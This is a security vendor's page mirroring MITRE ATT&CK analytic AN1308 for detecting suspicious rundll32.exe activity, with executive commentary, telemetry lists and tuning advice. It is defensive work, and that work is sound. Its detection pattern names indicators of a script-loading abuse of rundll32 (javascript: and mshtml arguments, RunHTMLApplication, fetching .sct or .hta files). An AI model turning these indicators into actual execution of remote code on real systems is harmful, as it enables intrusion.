Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN1308: Analytic 1308

Detects rundll32.exe invoked with atypical arguments (.dll, .cpl, , mshtml). DLLs not normally loaded by rundll32 are mapped into memory. Control_RunDLL or RunHTMLApplication invoked. Suspicious DLLs or scripts accessed from disk or network. Rundll32 reaches out to external domains (e.g., fetching .sct or .hta).

EnterpriseAN1308AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

This analytic matters because rundll32.exe is a legitimate Windows utility that can become difficult for teams to judge when it is launched with unusual DLL, Control Panel, JavaScript, mshtml, or network-retrieval patterns. For leaders, the practical issue is not the tool itself; it is whether the SOC can distinguish normal Windows/application activity from suspicious rundll32 behavior quickly enough to support containment decisions without overwhelming analysts with noise.

Executive priority

Prioritize this as a Windows monitoring and response-readiness validation item. Security leaders should ask whether endpoint telemetry captures rundll32 command lines, loaded modules, script or DLL access from disk and network locations, and outbound domain activity. This is useful evidence for incident response, managed detection quality, and audit discussions around endpoint visibility and suspicious system-utility execution. Because ATT&CK supplied no tactic mapping or relationships, treat it as a detection-control validation rather than a standalone risk assertion.

Technical view

Validate detection logic for rundll32.exe executions with atypical arguments including .dll, .cpl, javascript:, and mshtml indicators; invocations of Control_RunDLL or RunHTMLApplication; DLLs not normally loaded by rundll32 being mapped into memory; suspicious DLLs or scripts accessed from local or network paths; and rundll32 outbound connections to external domains, including retrieval of .sct or .hta content. Tune against known enterprise software, Control Panel activity, and administrative tooling to reduce false positives. Since no official detection logic is provided, teams must translate the description into local endpoint, process, module-load, file, script, and network analytics.

Likely telemetry

  • Windows process creation events with full command line for rundll32.exe
  • Parent and child process context for rundll32.exe
  • DLL/module load telemetry showing libraries mapped into rundll32 memory
  • File access telemetry for DLL, CPL, script, .sct, and .hta content from disk or network locations
  • Network connection and DNS/proxy telemetry for rundll32.exe outbound activity to external domains

Detection direction

  • Confirm rundll32.exe command-line capture is enabled and searchable on Windows endpoints.
  • Build or validate rules for atypical rundll32 arguments: .dll, .cpl, javascript:, mshtml, Control_RunDLL, and RunHTMLApplication.
  • Correlate process execution with module loads and file/network access to distinguish benign Control Panel or application behavior from suspicious DLL or script loading.
  • Review allowlists carefully; broad rundll32 exclusions can hide the very behavior this analytic is meant to surface.
  • Tune for known administrative and software-management activity to avoid excessive false positives.

Mitigation priorities

  • Ensure Windows endpoint logging or EDR policy captures process command line, module loads, file access, and process-scoped network activity relevant to rundll32.exe.
  • Establish baselines for legitimate rundll32 usage in the organization, including common Control Panel and application-driven invocations.
  • Harden response playbooks so analysts know when to collect command line, loaded DLLs, accessed files, network destinations, and parent-process context.
  • Use change control and software inventory context to separate expected application behavior from unusual rundll32 execution patterns.
  • Review detection exceptions periodically, especially any exclusions involving rundll32.exe, DLL loading, script content, or external network access.
Analyst notes and limits

ATT&CK identifies this as detection analytic AN1308 for Windows and describes suspicious rundll32.exe invocation patterns, memory-mapped DLL behavior, local or network script/DLL access, and outbound external-domain activity. There are no supplied relationships, aliases, labels, tactics, or official detection query, so the Glexia interpretation is focused on validation of telemetry and analytic engineering rather than attribution or campaign context.

This take is based only on the supplied ATT&CK STIX fields and external reference. No active exploitation, actor usage, impact, technique relationship, or guaranteed detection coverage is provided. Local environment baselines are required to determine what rundll32 behavior is normal and which events are actionable.

Official MITRE ATT&CK definition

Analytic 1308

Detects rundll32.exe invoked with atypical arguments (.dll, .cpl, , mshtml). DLLs not normally loaded by rundll32 are mapped into memory. Control_RunDLL or RunHTMLApplication invoked. Suspicious DLLs or scripts accessed from disk or network. Rundll32 reaches out to external domains (e.g., fetching .sct or .hta).

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
123722e7e7829a0e...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 123722e7e782…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack AN1308
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use